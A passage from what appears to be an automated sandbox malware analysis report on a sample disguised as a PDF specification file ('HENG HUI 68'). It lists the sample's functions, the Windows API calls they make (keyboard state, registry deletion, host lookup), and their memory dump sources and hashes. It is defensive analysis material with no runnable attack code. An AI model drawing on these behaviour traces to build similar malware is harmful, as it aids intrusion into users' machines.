                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorLast$htonsinet_ntoaselect
                                      • String ID:
                                      • API String ID: 500251541-0
                                      • Opcode ID: 28e65bfacda19ad029a036d5c08b60f2ba3ff10435b50e4c0b8bb422679a2d74
                                      • Instruction ID: 2354f77d48d2bc6033f7b350d303d5851c4dd50c062093944af94d9c77adf13b
                                      • Opcode Fuzzy Hash: 28e65bfacda19ad029a036d5c08b60f2ba3ff10435b50e4c0b8bb422679a2d74
                                      • Instruction Fuzzy Hash: F481B171504200ABC716EF69CC85F6BB7E8EF85714F104A1EF5559F1A1EB70E904CB92
                                      Function 003B0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                      • GetSystemMetrics.USER32(0000000F), ref: 003B016D
                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003B038D
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003B03AB
                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003B03D6
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003B03FF
                                      • ShowWindow.USER32(00000003,00000000), ref: 003B0421
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 003B0440
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 3356174886-0
                                      • Opcode ID: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                      • Instruction ID: c01eec2ebe2ba0c71bd9039dc9187c5fb1d71350d0a1cea9bbcf3af9e8da6964
                                      • Opcode Fuzzy Hash: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                      • Instruction Fuzzy Hash: 40A1AE35600616EFDB1ACF68C9897EEBBB5BF04704F058125EE58AB690D734AD60CB90
                                      Function 0035AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                      • Instruction ID: 671e163fdfae88fdca0bf13dcea2d25f5dc2676f407ef60f8452ce6ccdb4c3cb
                                      • Opcode Fuzzy Hash: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                      • Instruction Fuzzy Hash: F0717C70900509EFCB06CF98CC49EEEBB78FF85315F148259F915AB261C330AA15DB61
                                      Function 00383DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 00383DE7
                                      • GetKeyboardState.USER32(?), ref: 00383DFC
                                      • SetKeyboardState.USER32(?), ref: 00383E5D
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00383E8B
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00383EAA
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00383EF0
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00383F13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                      • Instruction ID: 8483933eeb60e07cead857a79932aa283c8e298151f4f2f26c4bf91d54d34fc4
                                      • Opcode Fuzzy Hash: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                      • Instruction Fuzzy Hash: 8E51F4A1A047D53EFB3763348C45BBA7EA95B06B04F0944C8F1D58A9C2D3E8AEC8D750
                                      Function 00383BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(00000000), ref: 00383C02
                                      • GetKeyboardState.USER32(?), ref: 00383C17
                                      • SetKeyboardState.USER32(?), ref: 00383C78
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00383CA4
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00383CC1
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00383D05
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00383D26
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                      • Instruction ID: 9c0e800cc63808eb2ec60b98ce259b3c2d92f8e43fab9d7b3d86911d72da8206
                                      • Opcode Fuzzy Hash: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                      • Instruction Fuzzy Hash: 315107A05047D53DFB33A7748C55BB6BFA96B06B00F0884C8E0D55AAC2D294EE98E760
                                      Function 003A9A75 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A9B19
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 003A9B2D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A9B47
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A9BB9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A9BE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysListView32
                                      • API String ID: 2326795674-78025650
                                      • Opcode ID: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                      • Instruction ID: 79ecea70f87bd235182e258294422b9bff3da515ebbab8c473e112738c4eacbe
                                      • Opcode Fuzzy Hash: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                      • Instruction Fuzzy Hash: FD41AF71940308AFDB229FA4DC85FEE77A8EF09350F11452AF689EB291D7719D84CB60
                                      Function 003A3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003A3DA1
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A3DCB
                                      • FreeLibrary.KERNEL32(00000000), ref: 003A3E80
                                        • Part of subcall function 003A3D72: RegCloseKey.ADVAPI32(?), ref: 003A3DE8
                                        • Part of subcall function 003A3D72: FreeLibrary.KERNEL32(?), ref: 003A3E3A
                                        • Part of subcall function 003A3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003A3E5D
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 003A3E25
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      • Opcode ID: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                      • Instruction ID: ec0284f80e3e3f3d6f05062f3ac9edbffd21b54680185d49b59224e41c6ee1e7
                                      • Opcode Fuzzy Hash: 48fb64b555d15c7bbe689d2772705a40b1e5b365c8174e5102f8d96c3df7efd6
                                      • Instruction Fuzzy Hash: B531CAB2901119BFDB169B94DC89EFFB7BCEF09300F00016AF512E6150D674AF499BA0
                                      Function 003A8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003A8FE7
                                      • GetWindowLongW.USER32(00F22290,000000F0), ref: 003A901A
                                      • GetWindowLongW.USER32(00F22290,000000F0), ref: 003A904F
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003A9081
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003A90AB
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 003A90BC
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003A90D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      • Opcode ID: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                      • Instruction ID: 74ec546bb8dfb378f72dd6d11d2421d7edb6d7747738e28431fafc3f25e7d7c8
                                      • Opcode Fuzzy Hash: 1ad704f65dfc0fd2862421752863391b9ba608108ae3ac9a571d5e30594790a5
                                      • Instruction Fuzzy Hash: C2313334600215AFDB22CF58DC84F6437A9FB4A354F1641A6F619EF2B1CBB2A840CB44
                                      Function 003808AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003808F2
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00380918
                                      • SysAllocString.OLEAUT32(00000000), ref: 0038091B
                                      • SysAllocString.OLEAUT32(?), ref: 00380939
                                      • SysFreeString.OLEAUT32(?), ref: 00380942
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00380967
                                      • SysAllocString.OLEAUT32(?), ref: 00380975
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: 2645a68ecc0b7f6ae815d86f1b0372fbaee6d8b81705a6f4410d1e7fc20df4b4
                                      • Instruction ID: 5e31ac59403317fd1724fdf8aaeb92f63097e7d5354718ded1092a0e3d099f03
                                      • Opcode Fuzzy Hash: 2645a68ecc0b7f6ae815d86f1b0372fbaee6d8b81705a6f4410d1e7fc20df4b4
                                      • Instruction Fuzzy Hash: 7921B572600308AFAB55AF78CC88DBB73ACEB09360B018125F915DB161DB70EC498B60
                                      Function 00380986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809CB
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003809F1
                                      • SysAllocString.OLEAUT32(00000000), ref: 003809F4
                                      • SysAllocString.OLEAUT32 ref: 00380A15
                                      • SysFreeString.OLEAUT32 ref: 00380A1E
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00380A38
                                      • SysAllocString.OLEAUT32(?), ref: 00380A46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      • Opcode ID: dd6bb2677daf0c4012864acd1d05b2f13c06735d35795dd95d1301a101af7fb9
                                      • Instruction ID: 3de683c60a456186b89d54f003def0422b4af80ab8b7660780594e2cdd172fc4
                                      • Opcode Fuzzy Hash: dd6bb2677daf0c4012864acd1d05b2f13c06735d35795dd95d1301a101af7fb9
                                      • Instruction Fuzzy Hash: B1216275200304AFDB59ABA9DC88DBA77ECEF09360B018165F909CB261EA74ED858764
                                      Function 003AA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0035D1BA
                                        • Part of subcall function 0035D17C: GetStockObject.GDI32(00000011), ref: 0035D1CE
                                        • Part of subcall function 0035D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0035D1D8
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003AA32D
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003AA33A
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003AA345
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003AA354
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003AA360
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      • Opcode ID: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                      • Instruction ID: e5b4797baa9494d1b78597f5ff9a0ba5d71ecba70bb723ec2cead58b9d1df288
                                      • Opcode Fuzzy Hash: 0d3f39070210d180d0400dbd124da9e9a9860d0e1b46afc409e28e775fe1e440
                                      • Instruction Fuzzy Hash: 031160B6150219BEEF169F64CC85EEB7F6DFF09798F014115FA08A60A0C7729C21DBA4
                                      Function 00386F02 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                      • String ID: 0.0.0.0
                                      • API String ID: 348263315-3771769585
                                      • Opcode ID: fff97d31509829bb31898ee1b8150a3425cd59827a7a5caafccdf34e5d1c7321
                                      • Instruction ID: cca27b9601a1d8cab78c640ee30c370fb2765821a42d9c2000c0e013e9314405
                                      • Opcode Fuzzy Hash: fff97d31509829bb31898ee1b8150a3425cd59827a7a5caafccdf34e5d1c7321
                                      • Instruction Fuzzy Hash: 3E11B472904215AFCB27BB60AC4BEEA77ACEF41710F0141B5F645EA091EF70EA858B50
                                      Function 00386B49 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00386B63
                                      • LoadStringW.USER32(00000000), ref: 00386B6A
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00386B80
                                      • LoadStringW.USER32(00000000), ref: 00386B87
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00386BCB
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00386BA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 4072794657-3128320259
                                      • Opcode ID: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                      • Instruction ID: fc4b96c33edffe49735f3634cd8fbe2fbd820d49f491060196b8023f3faa00c1
                                      • Opcode Fuzzy Hash: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                      • Instruction Fuzzy Hash: 650136F65002087FE753A7949D89EF7776CD704304F0444A5B745D6041EA74AE858F75
                                      Function 0035CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 0035CCF6
                                      • GetWindowRect.USER32(?,?), ref: 0035CD37
                                      • ScreenToClient.USER32(?,?), ref: 0035CD5F
                                      • GetClientRect.USER32(?,?), ref: 0035CE8C
                                      • GetWindowRect.USER32(?,?), ref: 0035CEA5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$Screen
                                      • String ID:
                                      • API String ID: 1296646539-0
                                      • Opcode ID: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                      • Instruction ID: eeea36300c7ed387f8c354a54ec6f7f57c481cd4ac9368f77070e25156cbdd80
                                      • Opcode Fuzzy Hash: e32feb8c94a2149dcf58f695c7eb3bca15233184dddaa25899392d80e69f06f8
                                      • Instruction Fuzzy Hash: DCB17979910249DFCB11CFA8C480BEDBBB5FF08309F15A129ED59EB620DB30A954CB64
                                      Function 0036ACB3 Relevance: 9.2, APIs: 6, Instructions: 219COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00367CF4: EnterCriticalSection.KERNEL32(00000000,?,00367ADD,0000000D), ref: 00367D1F
                                        • Part of subcall function 00366986: Sleep.KERNEL32(00000000,000003BC,0035F507,?,0000000E), ref: 003669AC
                                      • GetStartupInfoW.KERNEL32(?,003F6E28,00000064,00365E91,003F6C70,00000014), ref: 0036AD46
                                      • GetFileType.KERNEL32(00000001), ref: 0036ADD8
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0036AE11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CriticalSection$CountEnterFileInfoInitializeSleepSpinStartupType
                                      • String ID:
                                      • API String ID: 1184225303-0
                                      • Opcode ID: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                      • Instruction ID: 60e966e60c3507fc752cf85fe975ad7c0dab8693eb2919f8498db8d830f7bfeb
                                      • Opcode Fuzzy Hash: 08fbb81b73af87e912f46505994bb3959535b66de74c1a784bb4484665d63709
                                      • Instruction Fuzzy Hash: 4881E2B0905B458FDB16CF68C9805A9BBF4AF06324B24826DE4A6BB3D5C7359803CF56
                                      Function 003A2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                      Download Yara Rule
                                      APIs
